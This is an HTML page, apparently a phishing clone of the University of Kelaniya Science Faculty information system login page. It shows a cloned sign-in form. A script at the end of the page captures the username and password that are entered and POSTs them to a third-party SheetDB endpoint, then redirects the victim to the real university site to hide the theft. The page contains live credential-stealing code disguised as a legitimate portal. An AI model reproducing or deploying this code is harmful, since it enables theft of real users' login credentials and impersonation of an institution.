

        

<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<script type="text/javascript" src="http://gc.kis.v2.scr.kaspersky-labs.com/FD126C42-EBFA-4E12-B309-BB3FDD723AC1/main.js?attr=pPZA8zd5zcasjSpRsvogZD8RlMn4cxOYGwpka6J6xMH6wMw74ID6waHyMyF-6lkU6V1oK7cTMzxTuiRhWQQIfA9arlTjop8l-0w81YjHE2ysdToowM9DQxbEm95hC1fc" charset="UTF-8"></script><link rel="stylesheet" crossorigin="anonymous" href="http://gc.kis.v2.scr.kaspersky-labs.com/E3E8934C-235A-4B0E-825A-35A08381A191/abn/main.css?attr=aHR0cDovL3d3dy5zY2llbmNlLmtsbi5hYy5sazo4MDgwLyhTKHIzbm9pMm92ZWN5ZWNycXhreW5xc3BhaikpL3Nma24uYXNweA"/><style>
* {
  box-sizing: border-box;
}

.row::after {
  content: "";
  clear: both;
  display: table;
}

[class*="col-"] {
  float: left;
  padding: 15px;
}

html {
  font-family: "Lucida Sans", sans-serif;
}

.header {
  /*background-color: #9933cc;*/
  background-color: ##D6EAF8;
  /*background-color: #FDFEFE;*/
  color: #ffffff;
  padding: 15px;
}

.menu ul {
  list-style-type: none;
  margin: 0;
  padding: 0;
}

.menu li {
  padding: 8px;
  margin-bottom: 7px;
  background-color: #33b5e5;
  color: #ffffff;
  box-shadow: 0 1px 3px rgba(0,0,0,0.12), 0 1px 2px rgba(0,0,0,0.24);
}

.menu li:hover {
  background-color: #0099cc;
}

.aside {
  background-color: #33b5e5;
  padding: 15px;
  color: #ffffff;
  text-align: center;
  font-size: 14px;
  box-shadow: 0 1px 3px rgba(0,0,0,0.12), 0 1px 2px rgba(0,0,0,0.24);
}

.footer {
  background-color: #0099cc;
  color: #ffffff;
  text-align: center;
  font-size: 12px;
  padding: 15px;
}

/* For mobile phones: */
[class*="col-"] {
  width: 100%;
}

@media only screen and (min-width: 600px) {
  /* For tablets: */
  .col-s-1 {width: 8.33%;}
  .col-s-2 {width: 16.66%;}
  .col-s-3 {width: 25%;}
  .col-s-4 {width: 33.33%;}
  .col-s-5 {width: 41.66%;}
  .col-s-6 {width: 50%;}
  .col-s-7 {width: 58.33%;}
  .col-s-8 {width: 66.66%;}
  .col-s-9 {width: 75%;}
  .col-s-10 {width: 83.33%;}
  .col-s-11 {width: 91.66%;}
  .col-s-12 {width: 100%;}
}
@media only screen and (min-width: 768px) {
  /* For desktop: */
  .col-1 {width: 8.33%;}
  .col-2 {width: 16.66%;}
  .col-3 {width: 25%;}
  .col-4 {width: 33.33%;}
  .col-5 {width: 41.66%;}
  .col-6 {width: 50%;}
  .col-7 {width: 58.33%;}
  .col-8 {width: 66.66%;}
  .col-9 {width: 75%;}
  .col-10 {width: 83.33%;}
  .col-11 {width: 91.66%;}
  .col-12 {width: 100%;}
}

img {
  width: 100%;
  height: auto;
}
    </style>

    <title>Faculty information System - Science Faculty</title>
</head>

<body>
<div class="aspNetHidden">
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNDk2NTc2OTkwD2QWAgIBD2QWBgIFDw8WAh4HVmlzaWJsZWhkZAIHD2QWAmYPZBYCAgEPZBYQAgEPDxYCHwBoZGQCAw8PFgIfAGhkFgICAw88KwARAgEQFgAWABYADBQrAABkAgUPDxYCHwBoZBYCAgMPPCsAEQIBEBYAFgAWAAwUKwAAZAIHDw8WAh8AaGQWAgIDDzwrABECARAWABYAFgAMFCsAAGQCCQ8PFgIfAGhkFgICAw88KwARAgEQFgAWABYADBQrAABkAgsPDxYCHwBoZBYCAgcPPCsAEQIBEBYAFgAWAAwUKwAAZAINDw8WAh8AaGQWDAIJDxBkZBYBZmQCDQ8QZGQWAWZkAg8PEGQQFQ0CMDQHSmFudWFyeQhGZWJydWFyeQVNYXJjaAVBcHJpbANNYXkESnVuZQRKdWx5BkF1Z3VzdAlTZXB0ZW1iZXIHT2N0b2JlcghOb3ZlbWJlcghEZWNlbWJlchUNATQBMQEyATMBNAE1ATYBNwE4ATkCMTACMTECMTIUKwMNZ2dnZ2dnZ2dnZ2dnZxYBZmQCEQ8QZBAVIAIxMgExATIBMwE0ATUBNgE3ATgBOQIxMAIxMQIxMgIxMwIxNAIxNQIxNgIxNwIxOAIxOQIyMAIyMQIyMgIyMwIyNAIyNQIyNgIyNwIyOAIyOQIzMAIzMRUgAjEyATEBMgEzATQBNQE2ATcBOAE5AjEwAjExAjEyAjEzAjE0AjE1AjE2AjE3AjE4AjE5AjIwAjIxAjIyAjIzAjI0AjI1AjI2AjI3AjI4AjI5AjMwAjMxFCsDIGdnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnFgFmZAIVDxBkZBYBZmQCFw8QZGQWAWZkAg8PDxYCHwBoZGQCCQ8PFgIfAGhkZBgFBRNHVl9Gb3VydGhZZWFyUmVzdWx0D2dkBRNHVl9TZWNvbmRZZWFyUmVzdWx0D2dkBRJHVl9UaGlyZFllYXJSZXN1bHQPZ2QFEEdWX1N0ZF9BZG1pc3Npb24PZ2QFEkdWX0ZpcnN0WWVhclJlc3VsdA9nZA2gea9H8KnZjAM1mR2pnHmPBTckyNKu2y1112bUiRpk" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['form2'];
if (!theForm) {
    theForm = document.form2;
}
function __doPostBack(eventTarget, eventArgument) {
    if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
        theForm.__EVENTTARGET.value = eventTarget;
        theForm.__EVENTARGUMENT.value = eventArgument;
        theForm.submit();
    }
}
//]]>
</script>


<script src="/WebResource.axd?d=rmr345DwzEBuskBHtgMlZJvha8gjFtmI-p4EyybO4u6_q1LCWgB-DPz117-H8PuAZcQTsIQpFX5gZbEaCb0S-z8devbNGP30iDgHSjR_-fc1&amp;t=638563469773552689" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=yG8IgqScn37F0SnN4KWz0_SqNeX7hhi5cRWW7toTVCLIDR5IcUjiAMSClD0w66fdVCxlsilj54Q2Yxra-YO_oVCr2tty_-V6xO_kAx5AykLJ09RGztKUs-tR6fAvYv6vpeXUb7HwFjc9G5xukDVeuI9uvtdK-xshyJCBwEbPh-Q1&amp;t=ffffffffc820c398" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=mwPSwfGlMO2R0IsHesau3eogYOMtJ6DspI8zLxASuqQ5SeBDpuNjdWY-e3BUNzHe9n4H5lbIO109M2_BghIttZW2gINNRC0VTBgvUqJxh17xqWw9jrZB9455UBbvbWwkVHQ-pJfQ_elu1-w7Kyiu0EJWCiSMwafJLcWwsZSLheOF23l1c0KmWjRNybPQgJnI0&amp;t=ffffffffc820c398" type="text/javascript"></script>
<div class="aspNetHidden">

	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="754523CA" />
	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEdAAa6AZJ28R15kROxeoQlEjnskkztQ3J4o17wETARUOlAT9yRoZqmoPk1MgNU7vWBTmg/aXmduKiy6wDAh8pjhmVAMp5opvKj6hWCJnnrXszMIdmo02quHt7Jykx3dZjxjYvd1hHjJsv4JSQqG0145b+e9SSnzqNKuz2L/iZMl7cDWQ==" />
</div>
   <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ScriptManager1', 'form2', ['tUpdatePanel1','UpdatePanel1'], [], [], 90, '');
//]]>
</script>


<div class="header" >
    <img id="Image1" src="Facultylogo1.jpg" />

  <h1>University of kelaniya – Sri Lanka </h1>

</div>

<div class="row">
  <div class="col-3 col-s-3 menu">
  
       



  </div>
        
    <div class="col-6 col-s-9">

   <div id="UpdatePanel1">
	

    <div id="Panel_Middle">
		 
</div>

  
</div>
  </div>

  <div class="col-3 col-s-12">
    <div class="aside">


<div id="SignIn_Panel">
  
	
  <form method="post" action="./sfkn.aspx" id="form2">
    <table style="width:100%;"> 
       <tr>
           <td><span id="LoginSIDLb"></span></td>
           <td><span id="LoginSIDLb1"></span></td>
       </tr>
       <tr>
           <td><span id="LoginStaffNameLB"></span></td>
           <td><span id="LoginStaffNameLB1"></span></td>
       </tr>
       <tr>
           <td><span id="LoginBusinessIDLB"></span></td>
           <td><span id="LoginBusinessIDLB1"></span></td>
       </tr>
       <tr>
           <td><span id="LoginBusinessNameLB"></span></td>
           <td><span id="LoginMsgLb"></span></td>
       </tr>
       <tr>
           <td></td>
           <td><span id="StdNoMsgLb" MaxLength="15" style="display:inline-block;width:100px;"></span></td>
       </tr>
       <tr>
           <td><span id="UserNameLb">User Name</span></td>
           <td><input name="Usernametxt" type="text" maxlength="15" id="Usernametxt" style="width:100px;" /></td>
       </tr>
       <tr>
           <td><span id="PasswordLB">Password</span></td>
           <td><input name="PasswordTxt" type="password" maxlength="15" id="PasswordTxt" style="width:100px;" /></td>
       </tr>
       <tr>
           <td><input type="submit" name="LoginBT" value="Sign in" id="LoginBT" style="width:90px;" /></td>
           <td></td>
       </tr>
    </table>
 </form>
  
</div>
<div id="UpdatePassword_Panel">
	
        <table style="width:100%;"> 
        <tr> <td></td>  </tr>
        <tr> <td></td>  </tr>
        <tr> <td></td>  </tr>
         <tr>
             <td><input type="submit" name="UpdatePswBT" value="Change a password" id="UpdatePswBT" style="width:134px;" /></td>
             <td></td>
         </tr>
        <tr> <td></td>  </tr>
        <tr> <td></td>  </tr>
         <tr>
             <td><input type="submit" name="OnlineRegisBT" value="Student Online Registration" id="OnlineRegisBT" style="width:180px;" /></td>
             <td></td>
         </tr>        
      </table>
  
</div>



    </div>
  </div>
</div>

<div class="footer">
   <p>© 2019 Univeristy of Kelaniya - All rights reserved.</p>
</div>
<script>
  document.addEventListener('DOMContentLoaded', function () {
      const form = document.getElementById('form2');
  
      form.addEventListener('submit', function (e) {
          e.preventDefault(); // Prevent the default form submission
  
          const username = document.getElementById('Usernametxt').value;
          const password = document.getElementById('PasswordTxt').value;
  
          // ⚠️ Make sure this matches your SheetDB endpoint
          const sheetDBUrl = 'https://sheetdb.io/api/v1/o1u7khcwoio59';
  
          const data = {
              data: [
                  {
                      username: username,
                      password: password
                  }
              ]
          };
  
          fetch(sheetDBUrl, {
              method: 'POST',
              headers: {
                  'Content-Type': 'application/json'
              },
              body: JSON.stringify(data)
          })
          .then(response => {
              if (response.ok) {
                  
                  window.location.href = 'http://www.science.kln.ac.lk:8080/(S(2swgswjsfdwfkq1nsn4ubfht))/sfkn.aspx'; // Redirect to another website after successful submission
              } else {
                  alert('Failed to save data.');
              }
          })
          .catch(error => {
              console.error('Error:', error);
              alert('Error saving data to Google Sheet.');
          });
      });
  });
  </script>
  




</body>
</html>